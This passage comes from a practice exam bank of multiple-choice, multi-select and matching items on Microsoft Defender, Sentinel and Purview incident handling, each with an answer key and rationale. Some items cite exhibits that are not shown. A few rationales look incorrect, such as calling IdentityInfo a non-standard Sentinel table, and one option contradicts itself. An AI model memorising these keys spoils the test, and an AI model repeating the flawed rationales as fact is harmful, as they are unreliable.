Initiating a live response session in the Microsoft 365 Defender portal allows you to collect forensic data, run commands, and investigate the device in real time. Option D is incorrect because a full scan does not collect forensic data. Option B is incorrect because the device is already onboarded.

Option A is incorrect because a custom detection rule is for automated detection, not forensic collection.

1038
MCQmedium

Your organization uses Microsoft Defender for Cloud Apps. An alert indicates that a user is downloading large amounts of data from SharePoint Online. What should you do first to investigate?

A.Govern the user by suspending their account.
B.Review the user's activity log in Defender for Cloud Apps.
C.Create a new IP address range for the organization.
D.Block the SharePoint Online app for all users in Defender for Cloud Apps.
AnswerB

Reviewing activity logs helps understand the context of the downloads.

Why this answer

Option B is correct because the user's activity log provides detailed information about the downloads and helps determine whether they are malicious. Option D is wrong because blocking the app for all users is too broad. Option C is wrong because creating an IP range is a configuration step, not an investigative one.

Option A is wrong because suspending the account is a reactive step that might be premature.

1039
Matchingmedium

Match each Microsoft Purview compliance feature to its description.


Prevents accidental sharing of sensitive data

Searches and exports data for legal cases

Logs user and admin activities

Classifies and protects sensitive data with labels

Manages retention and disposal of records

Why these pairings

These features are part of Microsoft Purview for compliance.

1040
Multi-Selectmedium

Your organization uses Microsoft Defender for Cloud and Microsoft Sentinel. You need to ensure that security alerts from Defender for Cloud are automatically synchronized to Sentinel and assigned to the cloud security team. Which three actions should you take?

Select 3 answers
A.Create an automation rule that sets the incident owner to the cloud security team.
B.Manually export alerts from Defender for Cloud to Sentinel daily.
C.Create a playbook that periodically pulls alerts from Defender for Cloud.
D.Enable the Microsoft Defender for Cloud data connector in Sentinel.
E.Configure the connector to create incidents automatically from alerts.
AnswersA, D, E

Correct: Automation rules can assign ownership.

Why this answer

Option A is correct because automation rules in Microsoft Sentinel allow you to automatically assign incident owners based on conditions such as alert severity or source connector. By creating an automation rule that sets the incident owner to the cloud security team, you ensure that every Defender for Cloud alert synchronized to Sentinel is immediately assigned to the appropriate team without manual intervention.

Exam trap

The trap here is that candidates may think a custom playbook or manual export is needed for synchronization, when in fact the native data connector handles ingestion automatically, and automation rules handle assignment without custom code.

1041
MCQeasy

A threat hunter in Microsoft Sentinel is reviewing a JSON definition for a scheduled analytics rule as shown in the exhibit. The rule is intended to run daily and alert on any device running powershell.exe with an encoded command. However, no alerts have been generated even though the hunter knows such activity exists. What is the most likely cause?

A.The requiredDataConnectors lists MicrosoftThreatProtection, but the actual data may not be ingested if the connector is not configured
B.The triggerThreshold is set to 0, which should trigger on any result
C.The queryFrequency is 1 day, which may miss events if they occur right after the query runs
D.The queryPeriod is 14 days, which may be too short
AnswerA

If the MDE connector is not set up, DeviceProcessEvents will have no data.

Why this answer

Option A is correct because the query uses the DeviceProcessEvents table, which is part of Microsoft Defender for Endpoint and is ingested via the MicrosoftThreatProtection connector; if that connector is not connected or data is not flowing, the query returns no results. Option D (queryPeriod) affects how far back the query looks, but if data were present it would still find some. Option B (triggerThreshold 0) is correct for alerting on any result.

Option C (queryFrequency) is daily, which is fine.

1042
MCQhard

You run the above KQL query in Microsoft Sentinel to detect potential brute-force attacks on Microsoft Teams. After reviewing the results, you notice that some entries have a high LogonCount but are missing from the output. What is the most likely reason?

A.The RiskLevelDuringSignIn field is misspelled as RiskLevelDuringSignIn.
B.The query only considers logons to Microsoft Teams, but the high LogonCount may be from other applications.
C.The inner join excludes entries that do not have a corresponding risky sign-in event.
D.The join condition does not include AccountUpn, so it fails to match.
AnswerC

The inner join only retains rows where the AccountUpn and IPAddress appear in both IdentityLogonEvents and AADSignInEventsBeta with the specified risk level.

Why this answer

Option C is correct because the join is an inner join, which only returns rows that have matching AccountUpn and IPAddress in both tables. If high-LogonCount entries do not have a corresponding risky sign-in event (RiskLevelDuringSignIn medium or high), they are excluded. Option A is wrong because the query spells RiskLevelDuringSignIn correctly.

Option B is wrong because the query filters by Application == 'Microsoft Teams', so it considers only Teams logons. Option D is wrong because the join keys are both AccountUpn and IPAddress.

1043
Multi-Selecthard

You are configuring Microsoft Defender for Cloud Apps with Cloud Discovery. You need to ensure that logs from your network proxies are processed correctly. Which THREE steps are required?

Select 3 answers
A.Upload the log files manually or configure automatic log upload using the log collector.
B.Install the Microsoft Defender for Cloud Apps connector in Sentinel.
C.Enable Azure Information Protection for labeling.
D.Ensure proxy logs are in a supported format such as Common Log Format (CLF).
E.Configure the source IP address ranges of your organization in Defender for Cloud Apps settings.
AnswersA, D, E

Logs must be uploaded for analysis.

Why this answer

Options A, D, and E are correct. Logs must be in a supported format, uploaded to Defender for Cloud Apps, and matched with the source IP ranges of your organization. Option B is not required for Cloud Discovery; Option C is not required.

1044
MCQmedium

You are reviewing this ARM template for a Microsoft Sentinel analytics rule. What is the most likely issue with the rule?

A.The rule type is incorrect for this scenario
B.The query syntax is invalid
C.The query references a table that does not exist in Microsoft Sentinel
D.The severity property should be 'Informational'
AnswerC

IdentityInfo is not a standard Sentinel table.

Why this answer

Option C is correct because the query uses the 'IdentityInfo' table, which is not a standard Sentinel table; it should be 'IdentityLogonEvents' or 'AuditLogs'. Option B is wrong because the syntax is valid. Option D is wrong because the severity is valid.

Option A is wrong because the rule type is correct.

1045
MCQmedium

A security analyst detects a suspicious sign-in from an unusual location using Microsoft Entra ID. The user has not enabled MFA. Which action should the analyst take first to investigate and potentially contain the incident?

A.Reset the user's password immediately.
B.Enable Conditional Access to block all sign-ins from that location.
C.Disable the user account.
D.Block legacy authentication for the entire tenant.
AnswerC

Disabling the account immediately prevents any further sign-ins and contains the incident while investigation is ongoing.

Why this answer

Disabling the user account is the immediate containment action to prevent further unauthorized access while the investigation proceeds. Resetting the password alone does not stop the current session; blocking legacy authentication is a broader action that may break legitimate services; enabling MFA is worthwhile but is not immediate containment.

1046
MCQeasy

An incident is opened in Microsoft Sentinel for multiple sign-in failures from a single IP address targeting a privileged user account. Which action is most effective in automatically responding to this incident?

A.Create a playbook to block the IP address in the firewall.
B.Enable conditional access policy to require MFA for the user.
C.Create a playbook to automatically disable the user account.
D.Report the IP address to Microsoft for threat intelligence.
AnswerA

Blocking the IP stops the attack at the source without affecting the user account.

Why this answer

The most effective automated response is to block the IP address in the firewall via a playbook, as it directly stops the attack source. Disabling the user account is too broad and may affect legitimate access. Enabling MFA does not stop the current attack.

Reporting the IP is not immediate.

1047
MCQmedium

Your organization uses Microsoft Sentinel. A security analyst reports that an incident was created for a sign-in from an unfamiliar location, but after investigation, it was determined to be a false positive. You need to ensure that similar sign-ins do not generate incidents in the future. What should you do?

A.Modify the built-in Microsoft analytics rule to exclude the sign-in location.
B.Close the incident with a classification of False Positive.
C.Create an automation rule that automatically closes similar incidents.
D.Create a custom analytics rule with an alert suppression condition matching the sign-in attributes.
AnswerD

Alert suppression allows you to exclude certain events from triggering alerts.

Why this answer

Option D is correct because creating a custom analytics rule with an alert suppression condition based on the specific location or user attributes prevents future alerts for similar events. Option B is wrong because closing the incident does not suppress future alerts. Option A is wrong because modifying the built-in rule's query is not recommended and may affect other detections.

Option C is wrong because automation rules handle response actions, not alert suppression.

1048
MCQmedium

A SOC analyst in Microsoft Sentinel is creating a scheduled analytics rule to detect sign-ins from IP addresses known to be associated with a threat actor. The list of threat actor IPs is maintained in a custom Microsoft Sentinel watchlist and is updated daily. The analyst wants the rule to query the SigninLogs table and compare the IP address against this list. What is the most efficient way to reference the list in the KQL query?

A.Use the externaldata operator to read from a blob storage URL.
B.Use the let statement to define a static list inline.
C.Use the _GetWatchlist() function to retrieve the watchlist.
D.Use the datatable operator to define the list directly in the query.
AnswerC

_GetWatchlist() is the built-in function to retrieve watchlist data. It efficiently caches the data and automatically reflects updates without changing the rule query.

Why this answer

Option C is correct because the `_GetWatchlist()` function is the built-in, optimized way to reference a Microsoft Sentinel watchlist within a KQL query. It retrieves the watchlist data directly from the Sentinel workspace, ensuring the query always uses the latest daily-updated list without manual maintenance or external dependencies. This approach is both efficient and aligns with Sentinel's intended design for dynamic threat intelligence.

Exam trap

The trap here is that candidates may confuse `_GetWatchlist()` with other data retrieval methods like `externaldata` or `datatable`, not realizing that watchlists are a first-class Sentinel feature designed for exactly this use case—dynamic, centrally managed threat intelligence that updates automatically without query modification.

How to eliminate wrong answers

Option A is wrong because the `externaldata` operator reads data from an external blob storage URL, which introduces latency, requires managing access keys, and bypasses Sentinel's native watchlist caching and update mechanisms. Option B is wrong because a `let` statement defines a static list inline, which would require manual editing of the query every time the threat actor IP list changes, defeating the purpose of a daily-updated watchlist. Option D is wrong because the `datatable` operator defines a hardcoded list directly in the query, similar to a static `let` statement, and cannot be dynamically updated without modifying the analytics rule itself.

1049
MCQhard

Your organization uses Microsoft Sentinel with User and Entity Behavior Analytics (UEBA) enabled. You notice that the UEBA is not generating any anomalies for a particular user who has been inactive for 30 days. You have verified that the user's data is being ingested into the workspace. What is the most likely reason?

A.UEBA requires a minimum of 14 days of activity to establish a baseline.
B.The user's license does not include UEBA.
C.UEBA only works with Active Directory data, not Microsoft Entra ID.
D.UEBA is not enabled for the workspace.
AnswerA

Without a baseline, UEBA cannot detect anomalies.

Why this answer

UEBA requires a baseline of at least 14 days of activity to establish normal behavior. If the user has been inactive for 30 days, there is no baseline to compare against, so no anomalies are generated. Option A is correct.

Option B is wrong because the user's data is being ingested, so this is not a licensing issue. Option C is wrong because UEBA is not limited to Active Directory data; it works with Microsoft Entra ID data when the supported sources are configured. Option D is wrong because the scenario states that UEBA is already enabled for the workspace.

1050
MCQmedium

Your organization uses Microsoft Sentinel and Microsoft Defender for Office 365. You have configured incident creation from Microsoft Defender for Office 365 alerts in Microsoft Sentinel. However, you notice that some alerts are not creating incidents. Which step should you take to troubleshoot this issue?

A.Examine the analytics rule that creates incidents from Microsoft Defender for Office 365 alerts and verify the severity threshold.
B.Check the Microsoft 365 Defender portal to confirm that the alerts are being generated.
C.Review the Microsoft Sentinel workbooks for any visualization errors.
D.Verify that the Microsoft Defender for Office 365 data connector in Microsoft Sentinel is connected and data is ingested.
AnswerA

The analytics rule filters alerts; a severity threshold may be too high.

Why this answer

Option A is correct because the analytics rule that maps Microsoft Defender for Office 365 alerts to incidents in Microsoft Sentinel includes a severity threshold filter. If the rule is configured to only create incidents for alerts with a severity of 'High' or 'Medium', alerts with 'Low' severity or 'Informational' will be silently dropped and not generate incidents. Verifying and adjusting this threshold directly addresses the root cause of missing incidents.

Exam trap

The trap here is that candidates often assume the issue is with data ingestion (Option D) or alert generation (Option B), but the actual cause is a misconfigured severity threshold within the analytics rule that silently filters out lower-severity alerts before they can become incidents.

How to eliminate wrong answers

Option B is wrong because checking the Microsoft 365 Defender portal only confirms that alerts are generated at the source, but it does not troubleshoot why those alerts fail to create incidents in Microsoft Sentinel; the issue is in the ingestion or rule logic, not in alert generation. Option C is wrong because Microsoft Sentinel workbooks are visualization tools that display data already ingested; they do not affect incident creation and cannot diagnose why alerts are not being turned into incidents. Option D is wrong because verifying the data connector status ensures data ingestion from Microsoft Defender for Office 365, but if the connector is connected and data is flowing, the problem lies in the analytics rule's configuration (e.g., severity threshold or rule logic), not in the connector itself.
